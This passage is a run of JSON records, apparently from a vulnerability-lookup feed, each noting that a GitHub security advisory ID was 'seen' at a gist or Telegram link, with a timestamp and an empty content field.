"2026-01-24T22:16:20.000000Z"}, {"uuid": "ea8ca7ae-6bc1-4f84-8611-18a459b58dd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C32P-WCQJ-J677", "type": "seen", "source": "https://gist.github.com/alon710/e6c95210dd6b8a1d9433d1e8cc5303b8", "content": "", "creation_timestamp": "2026-01-24T22:16:17.000000Z"}, {"uuid": "29c217ef-9ab7-4f98-85a1-e115d52dd823", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xjhm-gp88-8pfx", "type": "seen", "source": "https://gist.github.com/alon710/693c74061a6a581784371a7782575cd8", "content": "", "creation_timestamp": "2026-01-24T22:18:59.000000Z"}, {"uuid": "54e54cbd-4856-4ed3-a95b-ed741ef352b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xjhm-gp88-8pfx", "type": "seen", "source": "https://gist.github.com/alon710/999da6e47862ba22114494b09c546c7d", "content": "", "creation_timestamp": "2026-01-24T22:18:56.000000Z"}, {"uuid": "1643c1ad-7b63-4703-9d9d-5e78698eb634", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qv7w-v773-3xqm", "type": "seen", "source": "https://gist.github.com/alon710/cc19cdbf886a7f0fc1a21ad73c4ca9a0", "content": "", "creation_timestamp": "2026-01-24T22:18:53.000000Z"}, {"uuid": "50ccb377-123e-4f41-baf9-4b8fb4ebaf5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qv7w-v773-3xqm", "type": "seen", "source": "https://gist.github.com/alon710/56d345093e0b9cc61c2e88a696522199", "content": "", "creation_timestamp": "2026-01-24T22:18:50.000000Z"}, {"uuid": "a7d8eda2-14fc-41d3-be56-9c06c0c97df9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RJR4-V43M-PXQ6", "type": "seen", "source": "https://gist.github.com/alon710/cae7a45a136fb22afa66ba763e2644a7", "content": "", "creation_timestamp": "2026-01-24T22:18:47.000000Z"}, {"uuid": "beded87d-d586-434b-8eda-cbcb266a78e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RJR4-V43M-PXQ6", "type": "seen", "source": "https://gist.github.com/alon710/b312831a52be5db8f4749d685dcc74b7", "content": "", "creation_timestamp": "2026-01-24T22:18:45.000000Z"}, {"uuid": "8f792c81-f906-45ab-a35f-2b51b8323da6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w757-4qv9-mghp", "type": "seen", "source": "https://gist.github.com/alon710/f0b63345f840fde94ea322972de6f15a", "content": "", "creation_timestamp": "2026-01-24T22:40:52.000000Z"}, {"uuid": "9aa21071-36c8-440a-ab6e-411c3a5ace82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-ffj4-jq7m-9g6v", "type": "seen", "source": "https://gist.github.com/alon710/183dfa8fe2aae4a1b39fa253c00e4eb8", "content": "", "creation_timestamp": "2026-01-24T22:40:51.000000Z"}, {"uuid": "4bcc8d2d-04db-4ef7-a15f-3b3115d6c951", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7vp9-x248-9vr9", "type": "seen", "source": "https://gist.github.com/alon710/a8ccd1b8a5b462fb4174f4753d23df6c", "content": "", "creation_timestamp": "2026-01-24T22:40:50.000000Z"}, {"uuid": "89843c2e-dda7-46b5-b432-cafb7b1f8148", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3pqc-836w-jgr7", "type": "seen", "source": "https://gist.github.com/alon710/a0a6ca19395fc0b4269383b311c7e5c0", "content": "", "creation_timestamp": "2026-01-24T22:40:49.000000Z"}, {"uuid": "2e339825-21d4-47b0-bb7f-37b47517571e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c83v-7274-4vgp", "type": "seen", "source": "https://gist.github.com/alon710/55729466ace268e4b1b20a1e5f044c77", "content": "", "creation_timestamp": "2026-01-24T22:40:48.000000Z"}, {"uuid": "b9a3ad1a-2167-4f19-b9b6-b57e124ce467", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3vhc-576x-3qv4", "type": "seen", "source": "https://gist.github.com/alon710/9b7dc1d28ffb8ace8053305fb3f152af", "content": "", "creation_timestamp": "2026-01-24T22:40:46.000000Z"}, {"uuid": "d9e4eb96-acb4-47b0-bb12-0c8e115fdbe4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-58pv-8j8x-9vj2", "type": "seen", "source": "https://gist.github.com/alon710/1379519471c914819c96c0c6696bbe55", "content": "", "creation_timestamp": "2026-01-24T22:40:45.000000Z"}, {"uuid": "9eb0709b-d585-47fa-a8d4-cb8fcadda479", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jm66-cg57-jjv5", "type": "seen", "source": "https://gist.github.com/alon710/d9e28aaeb04763eaa506961bc0cd8a7d", "content": "", "creation_timestamp": "2026-01-24T22:40:44.000000Z"}, {"uuid": "76b6f036-10bd-442c-9d40-72223d1d6fc7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5J7Q-WMH7-CQHG", "type": "seen", "source": "https://gist.github.com/alon710/9665368f01a897c844ae06e46400c147", "content": "", "creation_timestamp": "2026-01-24T22:40:43.000000Z"}, {"uuid": "51100818-9c6a-43f7-99fe-6ba5a5563eb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q5f6-qxm2-mcqm", "type": "seen", "source": "https://gist.github.com/alon710/9abd26d07048f88e13b0eccb19e938c5", "content": "", "creation_timestamp": "2026-01-24T22:40:42.000000Z"}, {"uuid": "dc8a3ad6-8b1b-43fe-a443-0388c4e4aef7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vxw4-wv6m-9hhh", "type": "seen", "source": "https://gist.github.com/alon710/1dc0ed0d520f0819b06be2b5a73e16e1", "content": "", "creation_timestamp": "2026-01-24T22:40:41.000000Z"}, {"uuid": "70096d31-a327-4cfa-a440-afdba37a294a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jm5j-jfrm-hm23", "type": "seen", "source": "https://gist.github.com/alon710/bfeb43b616a6a1171af5f30844880e82", "content": "", "creation_timestamp": "2026-01-24T22:40:40.000000Z"}, {"uuid": "c7b6bd45-b104-49fe-8c5c-ae6abf267f2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3F44-XW83-3PMG", "type": "seen", "source": "https://gist.github.com/alon710/bc50223db58281af0ae6de90dce4ab7c", "content": "", "creation_timestamp": "2026-01-24T22:40:38.000000Z"}, {"uuid": "9f3998b1-9f22-48fa-bbc0-d5cf32708bb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78h3-63c4-5fqc", "type": "seen", "source": "https://gist.github.com/alon710/e84489cef540f02c69650e734e209412", "content": "", "creation_timestamp": "2026-01-24T22:41:23.000000Z"}, {"uuid": "fef73a2a-0083-4154-921c-ea91219e9708", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x4m5-4cw8-vc44", "type": "seen", "source": "https://gist.github.com/alon710/50d1c5074480f85c7f106c1b1c29f2ab", "content": "", "creation_timestamp": "2026-01-24T22:44:03.000000Z"}, {"uuid": "cfe485f1-c0a8-45f4-93c8-f5d667bb3c57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2mwc-h2mg-v6p8", "type": "seen", "source": "https://gist.github.com/alon710/5a5fd0c0cf4a2b079f4cae91831c6b4c", "content": "", "creation_timestamp": "2026-01-24T22:43:29.000000Z"}, {"uuid": "c581702a-e494-4d09-b8ba-4083bcf75bf2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g84x-mcqj-x9qq", "type": "seen", "source": "https://gist.github.com/alon710/87c35752cdb43bad7a529c1a129f5bfa", "content": "", "creation_timestamp": "2026-01-24T22:42:57.000000Z"}, {"uuid": "24cdc28f-e0b6-45df-9366-a8a48fe1f228", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6jhg-hg63-jvvf", "type": "seen", "source": "https://gist.github.com/alon710/f97ab886aebf7ceaec2e266173ac0413", "content": "", "creation_timestamp": "2026-01-24T22:42:56.000000Z"}, {"uuid": "83ee33ed-bb4f-440e-aa81-af6e2a69c60d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J965-2QGJ-VJMQ", "type": "seen", "source": "https://gist.github.com/alon710/f9b92ae38bfab7ffb0bbf70b557e4077", "content": "", "creation_timestamp": "2026-01-24T22:41:57.000000Z"}, {"uuid": "ad826e8a-92d4-4921-bcd6-0b54bc68192f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xphh-5v4r-r3rx", "type": "seen", "source": "https://gist.github.com/alon710/f64e0b81cd1c4e93689224703402afc0", "content": "", "creation_timestamp": "2026-01-24T22:44:05.000000Z"}, {"uuid": "3e0be842-e4a3-4d26-88b9-46ed56f6764e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jj3x-wxrx-4x23", "type": "seen", "source": "https://gist.github.com/alon710/9f142afedca1a259f656088ec0aa286b", "content": "", "creation_timestamp": "2026-01-24T22:42:55.000000Z"}, {"uuid": "230b27b6-6f01-43d9-8993-61dfa5738d28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HQF9-8XV5-X8XW", "type": "seen", "source": "https://gist.github.com/alon710/5c84df142bdd65eaaf0758be28319106", "content": "", "creation_timestamp": "2026-01-24T22:43:01.000000Z"}, {"uuid": "bc9020d3-e746-4607-9b70-123181bd7d9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-54jq-c3m8-4m76", "type": "seen", "source": "https://gist.github.com/alon710/50282cba0fbab13229e0ac4746daf1ef", "content": "", "creation_timestamp": "2026-01-24T22:42:54.000000Z"}, {"uuid": "59b685fd-7fc7-4889-9064-27e400665d7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-829q-m3qg-ph8r", "type": "seen", "source": "https://gist.github.com/alon710/2e8009023735f4d09d408cdce29756e7", "content": "", "creation_timestamp": "2026-01-24T22:42:53.000000Z"}, {"uuid": "d8f554d3-b839-4ba5-b86d-bc5cff9f0e21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vrjc-q2fh-6x9h", "type": "seen", "source": "https://gist.github.com/alon710/4b34c3260511350eaa0b02dec52d3224", "content": "", "creation_timestamp": "2026-01-24T22:42:52.000000Z"}, {"uuid": "3dc0dc8b-2e19-4300-9d4a-b0b99402f555", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6MW6-MJ76-GRWC", "type": "seen", "source": "https://gist.github.com/alon710/350d54a2bd3192801aa5fae40b7cb39c", "content": "", "creation_timestamp": "2026-01-24T22:42:48.000000Z"}, {"uuid": "207d419c-e791-48e4-bd07-604372063fe5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wjpc-4f29-83h3", "type": "seen", "source": "https://gist.github.com/alon710/9b894307c0e0fd5d015f1e35970078cc", "content": "", "creation_timestamp": "2026-01-24T22:42:47.000000Z"}, {"uuid": "df412476-e217-4f66-ba86-b6c4ccf7ea27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9C48-W39G-HM26", "type": "seen", "source": "https://gist.github.com/alon710/b128d27555414726258a53d6027898de", "content": "", "creation_timestamp": "2026-01-24T22:42:46.000000Z"}, {"uuid": "0b987254-e620-4511-93b5-b9e1a439aac2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hjr9-wj7v-7hv8", "type": "seen", "source": "https://gist.github.com/alon710/54c2041f4724de153b8f1d712e343037", "content": "", "creation_timestamp": "2026-01-24T22:42:45.000000Z"}, {"uuid": "02926326-0442-41ac-8e8f-ea0709794d64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3573-4c68-g8cc", "type": "seen", "source": "https://gist.github.com/alon710/b7d2c0b7383cd580051394a75b51a846", "content": "", "creation_timestamp": "2026-01-24T22:42:44.000000Z"}, {"uuid": "109389c2-8592-4dbe-8060-a53feb6c0f2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rxwq-x6h5-x525", "type": "seen", "source": "https://gist.github.com/alon710/0cf14b18a242bc246ba0f89df0d4e9e3", "content": "", "creation_timestamp": "2026-01-24T22:42:43.000000Z"}, {"uuid": "d4e63a01-fc44-43f4-a645-eb75de91f8c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jc7g-x28f-3v3h", "type": "seen", "source": "https://gist.github.com/alon710/75bd805fd5fae660ad9e3111584de4d0", "content": "", "creation_timestamp": "2026-01-24T22:42:40.000000Z"}, {"uuid": "288288ae-47f9-4288-aa6d-7be62d9fb1e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2hj5-g64g-fp6p", "type": "seen", "source": "https://gist.github.com/alon710/f12ca181daaf9bee3d80d12a5f6df0b3", "content": "", "creation_timestamp": "2026-01-24T22:42:39.000000Z"}, {"uuid": "e16d9d8c-8b73-4dce-accd-abcc4a21482d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f2mf-q878-gh58", "type": "seen", "source": "https://gist.github.com/alon710/8afbf43216b50a80bef5956581c694b8", "content": "", "creation_timestamp": "2026-01-24T22:42:38.000000Z"}, {"uuid": "1ac8f174-2e8f-49dc-b49b-c3899f753f09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q9f5-625g-xm39", "type": "seen", "source": "https://gist.github.com/alon710/d47e577d192090116b68a7b27e69bca4", "content": "", "creation_timestamp": "2026-01-24T22:42:37.000000Z"}, {"uuid": "8704f03e-4e40-41bd-ae91-9425ea1b6013", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gg4x-fgg2-h9w9", "type": "seen", "source": "https://gist.github.com/alon710/e71ad8fdc77898d5b7ee21712697284c", "content": "", "creation_timestamp": "2026-01-24T22:42:33.000000Z"}, {"uuid": "a63825ce-3f22-4ef6-9b0d-e2b979c089d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f3gw-9ww9-jmc3", "type": "seen", "source": "https://gist.github.com/alon710/d7aaf1c76ca3b28f6e9c13a27aff2873", "content": "", "creation_timestamp": "2026-01-24T22:42:31.000000Z"}, {"uuid": "3d48c810-fcae-4b3f-91a2-9d9d58bc8ed7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f456-rf33-4626", "type": "seen", "source": "https://gist.github.com/alon710/677c31165f9a85d13ab3c57e768bf17a", "content": "", "creation_timestamp": "2026-01-24T22:18:35.000000Z"}, {"uuid": "f3e52dc5-e715-4e00-9380-e22927e26356", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f456-rf33-4626", "type": "seen", "source": "https://gist.github.com/alon710/efeb72001ad6d1c70402648d89c0ef0e", "content": "", "creation_timestamp": "2026-01-24T22:18:32.000000Z"}, {"uuid": "ea082c43-3bb6-4d84-956e-81bfbc9636fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x6jc-phwx-hp32", "type": "seen", "source": "https://gist.github.com/alon710/fdb66667dae377d6dedee5195bd6b161", "content": "", "creation_timestamp": "2026-01-24T22:17:43.000000Z"}, {"uuid": "2a3d0190-af86-451b-8439-7d2db4e5e41b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xxjr-mmjv-4gpg", "type": "seen", "source": "https://gist.github.com/alon710/8fa5336cf4f575304a8f1204833e38a2", "content": "", "creation_timestamp": "2026-01-24T22:19:38.000000Z"}, {"uuid": "d01b0aae-fbd7-4c7e-b527-cc2dd33c1761", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4c4x-jm2x-pf9j", "type": "seen", "source": "https://gist.github.com/alon710/58318b0decdc610235d06378257dc810", "content": "", "creation_timestamp": "2026-01-24T22:18:29.000000Z"}, {"uuid": "b878b353-e510-4ca0-97e6-f8e02a58bef7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4c4x-jm2x-pf9j", "type": "seen", "source": "https://gist.github.com/alon710/afa35ad8ac0df4fc5f6a9e836c44fd37", "content": "", "creation_timestamp": "2026-01-24T22:18:26.000000Z"}, {"uuid": "831681a9-12c3-47a8-8fde-db26c8f956a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-R389-865G-HCG3", "type": "seen", "source": "https://t.me/securixy_kz/1030", "content": "", "creation_timestamp": "2026-07-12T22:00:09.653139Z"}, {"uuid": "1e7304d9-1144-4b4d-a26a-f6dd86b20c88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JP3Q-WWP3-PWV9", "type": "seen", "source": "https://gist.github.com/alon710/ce8d2ab47671c874266b418441abfee0", "content": "", "creation_timestamp": "2026-01-24T22:18:11.000000Z"}, {"uuid": "be3dc106-ba3c-477e-aee1-5cce672d013e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JP3Q-WWP3-PWV9", "type": "seen", "source": "https://gist.github.com/alon710/71d11b0b3777ad57595724d39e0b4833", "content": "", "creation_timestamp": "2026-01-24T22:18:09.000000Z"}, {"uuid": "d025fc21-0768-4bb7-9066-ab85d8b1a20e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fcv2-xgw5-pqxf", "type": "seen", "source": "https://gist.github.com/alon710/6fc946ee0533a43d90951a9879a201f4", "content": "", "creation_timestamp": "2026-01-24T22:17:59.000000Z"}, {"uuid": "185573b6-e35e-4cfc-a3e4-202c7dab2741", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fcv2-xgw5-pqxf", "type": "seen", "source": "https://gist.github.com/alon710/be2815b69f79341bb284c55ad42b006c", "content": "", "creation_timestamp": "2026-01-24T22:17:57.000000Z"}, {"uuid": "0800ce9f-ca84-488c-9c1e-24b765142b29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7f67-crqm-jgh7", "type": "seen", "source": "https://gist.github.com/alon710/cecbab75d3b11747b96af6081b44ff83", "content": "", "creation_timestamp": "2026-01-24T22:17:48.000000Z"}, {"uuid": "0cda36e8-e315-4e8b-8147-60645c520cab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7f67-crqm-jgh7", "type": "seen", "source": "https://gist.github.com/alon710/543753c27c7f6e4098be705e7a0f8833", "content": "", "creation_timestamp": "2026-01-24T22:17:46.000000Z"}, {"uuid": "1ff77539-9333-4599-9a22-f56249d7c429", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x6jc-phwx-hp32", "type": "seen", "source": "https://gist.github.com/alon710/b5f994e43ba8dd132df338a888325643", "content": "", "creation_timestamp": "2026-01-24T22:17:40.000000Z"}, {"uuid": "4a6917cf-8c91-42cc-a035-ee5945842e48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hx9q-6w63-j58v", "type": "seen", "source": "https://gist.github.com/alon710/0c47484899a12350c8bad1ed6d2c9a2e", "content": "", "creation_timestamp": "2026-01-24T22:17:31.000000Z"}, {"uuid": "48670aeb-1970-40a0-8481-d05412dc4260", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hx9q-6w63-j58v", "type": "seen", "source": "https://gist.github.com/alon710/ccf28ffef170d8da1ed890bd93dddf00", "content": "", "creation_timestamp": "2026-01-24T22:17:28.000000Z"}, {"uuid": "b0b5e834-d773-45c4-b787-5dc493385ac3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hpwg-xg7m-3p6m", "type": "seen", "source": "https://gist.github.com/alon710/0fdec928aeb665e1525daac9b0015197", "content": "", "creation_timestamp": "2026-01-24T22:20:27.000000Z"}, {"uuid": "58259659-7077-48aa-aceb-89b82f189c51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-339m-4qw5-j2g3", "type": "seen", "source": "https://gist.github.com/alon710/52f3507a2015148285dca1947e682b53", "content": "", "creation_timestamp": "2026-01-24T22:21:14.000000Z"}, {"uuid": "89ccb3c3-86d4-4bd2-a4ba-2954703f080b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hpwg-xg7m-3p6m", "type": "seen", "source": "https://gist.github.com/alon710/54374707e721f17bc8c93bf012936620", "content": "", "creation_timestamp": "2026-01-24T22:20:32.000000Z"}, {"uuid": "02a6887a-b149-4012-840e-8cfc32c1a7de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hpwg-xg7m-3p6m", "type": "seen", "source": "https://gist.github.com/alon710/c9304c950697b24cd631266042c18934", "content": "", "creation_timestamp": "2026-01-24T22:20:30.000000Z"}, {"uuid": "08bbeaa7-28ca-4b22-8e25-439beceab784", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hpwg-xg7m-3p6m", "type": "seen", "source": "https://gist.github.com/alon710/622c28232f38071ed263185e0b0b85fa", "content": "", "creation_timestamp": "2026-01-24T22:20:24.000000Z"}, {"uuid": "c1114d92-09cc-4cfc-a56e-fe1a074f545b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-95c6-p277-p87g", "type": "seen", "source": "https://gist.github.com/alon710/92059b595c3c813b7223a5e918f98a9a", "content": "", "creation_timestamp": "2026-01-24T22:20:11.000000Z"}, {"uuid": "2fdbd531-3b41-4182-ae0f-395230b9b8f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pchf-49fh-w34r", "type": "seen", "source": "https://gist.github.com/alon710/53b7c9bb6a9fc67447de87e571471716", "content": "", "creation_timestamp": "2026-01-24T22:19:44.000000Z"}, {"uuid": "ff592caf-12a7-4823-9c53-8636a84ffcf2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-95c6-p277-p87g", "type": "seen", "source": "https://gist.github.com/alon710/f17c191c4ac19487c061ab4901bb1208", "content": "", "creation_timestamp": "2026-01-24T22:20:08.000000Z"}, {"uuid": "e23126c0-1974-48d1-ad68-ecc0f49ec6ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-95c6-p277-p87g", "type": "seen", "source": "https://gist.github.com/alon710/e3df44cdcad1bf3e9e34acba2bfe9177", "content": "", "creation_timestamp": "2026-01-24T22:20:04.000000Z"}, {"uuid": "2eca6204-feef-44e4-9725-bd7dca0dae5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-95c6-p277-p87g", "type": "seen", "source": "https://gist.github.com/alon710/b660f58aa4c305563cea5424b15ad791", "content": "", "creation_timestamp": "2026-01-24T22:20:02.000000Z"}, {"uuid": "72522dbe-65ea-458a-b008-79e7ef3d9851", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6pmj-xjxp-p8g9", "type": "seen", "source": "https://gist.github.com/alon710/00d6ffbc46224813901ad3837944661d", "content": "", "creation_timestamp": 